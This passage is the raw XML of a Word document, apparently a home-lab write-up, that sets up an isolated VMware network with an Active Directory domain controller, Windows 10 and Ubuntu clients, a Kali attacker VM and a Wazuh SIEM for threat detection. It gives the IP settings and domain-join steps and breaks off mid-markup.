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6A1EA" w14:textId="77777777" w:rsidR="00334BEE" w:rsidRPr="00334BEE" w:rsidRDefault="00334BEE" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00334BEE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Goal: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3C981" w14:textId="018BFC31" w:rsidR="00334BEE" w:rsidRPr="00334BEE" w:rsidRDefault="00334BEE" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00334BEE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Deploy a fully isolated virtual lab with Active Directory and Wazuh SIEM for basic threat detection, monitoring, and automated response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB82A1" w14:textId="77777777" w:rsidR="00334BEE" w:rsidRPr="00334BEE" w:rsidRDefault="00334BEE" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560508FB" w14:textId="3B8C00CC" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VMware &amp; Network Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A366B2A" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>VMware Workstation Pro installed</w:t>
      </w:r>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004449CF">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://support.broadcom.com/group/ecx/my-dashboard</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34B9E5E7" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB598DF" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Host-Only network (VMnet1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B68792" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Subnet: 192.168.182.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B9661" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Subnet mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44AC66" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Purpose: isolated lab, static IP assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196C8DA" w14:textId="77777777" w:rsidR="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>No internet access by default (can switch to NAT if needed temporarily)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37925AC2" w14:textId="77777777" w:rsidR="004E1D6F" w:rsidRPr="004449CF" w:rsidRDefault="004E1D6F" w:rsidP="004E1D6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A44084" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="00000000" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="7ACA37D0">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="784BE263" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Virtual Machines Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tableausimple1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="2763"/>
        <w:gridCol w:w="5393"/>
      </w:tblGrid>
      <w:tr w:rsidR="003276E6" w:rsidRPr="003276E6" w14:paraId="1693E12A" w14:textId="77777777" w:rsidTr="00327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38F963" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>VM Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC40389" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>OS Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30C87DEE" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Role / Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003276E6" w:rsidRPr="003276E6" w14:paraId="69EABBC8" w14:textId="77777777" w:rsidTr="0032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1C998" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B0FB50C" w14:textId="5314656C"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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A14541" w14:textId="77777777"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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SIEM Manager &amp; monitoring system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003276E6" w:rsidRPr="003276E6" w14:paraId="5C93DECE" w14:textId="77777777" w:rsidTr="003276E6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D32DA85" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F60B9D" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows 10 Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44286412" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Endpoint workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003276E6" w:rsidRPr="001E2C55" w14:paraId="7DC3DA36" w14:textId="77777777" w:rsidTr="0032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75DA1" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Windows AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="742FA654" w14:textId="77777777"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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Server 2022 Std</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="630CD13C" w14:textId="77777777"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lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Domain Controller with AD DS role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003276E6" w:rsidRPr="003276E6" w14:paraId="10A48AD4" w14:textId="77777777" w:rsidTr="003276E6">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D974DA4" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108A6885" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ubuntu 22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D864EC" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Additional Linux client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003276E6" w:rsidRPr="001E2C55" w14:paraId="2C69FD05" w14:textId="77777777" w:rsidTr="00327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E995F" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14FE8763" w14:textId="77777777"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3276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kali 2025.2 (Prebuilt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039CAB73" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003276E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Attacker machine (prebuilt .7z image, ~80GB VMDK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791C8307" w14:textId="363434DA" w:rsidR="003276E6" w:rsidRPr="000F1E68" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74031B1E" w14:textId="20AD2E4E" w:rsidR="00A97D2F" w:rsidRPr="000F1E68" w:rsidRDefault="00A97D2F" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64653C4E" w14:textId="1DD3BAB9" w:rsidR="003276E6" w:rsidRPr="004E1D6F" w:rsidRDefault="003276E6" w:rsidP="004E1D6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F1E68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows Server Setup &amp; Configuration</w:t>
      </w:r>
      <w:r w:rsidR="00647072">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Version chosen: </w:t>
      </w:r>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows Server 2022 Standard with GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC779C5" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71973096" w14:textId="2D0F8BB4" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Static IP assigned: 192.168.182.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FE945" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Subnet Mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D60B6" w14:textId="42745656" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Preferred DNS: 192.168.182.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40308C02" w14:textId="338CE184" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="008C00F6">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2177FC93" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Installed &amp; Configured: Active Directory Domain Services (AD DS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132150B2" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Added AD DS role via Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00218679" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Promoted server to Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21308037" w14:textId="73847B54" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Created new domain and forest : WinServ.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3708F" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>DNS server installed automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1F71D" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Set Directory Services Restore Mode (DSRM) password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1F338" w14:textId="0BDC58DA" w:rsidR="003276E6" w:rsidRPr="000F1E68" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FC8388" w14:textId="7991A4FA" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows 10 VM Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EF098" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70B82E" w14:textId="260C8124" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Static IP assigned: 192.168.182.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56A90F" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Subnet Mask: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA070F4" w14:textId="4E6C9A41" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Gateway: host IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A0593" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>DNS Server: Set to Domain Controller IP (192.168.182.10) to enable domain discovery and join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1454B671" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E7BEF5" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Joined Windows 10 VM to domain WinServ.local using domain admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25956F6F" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
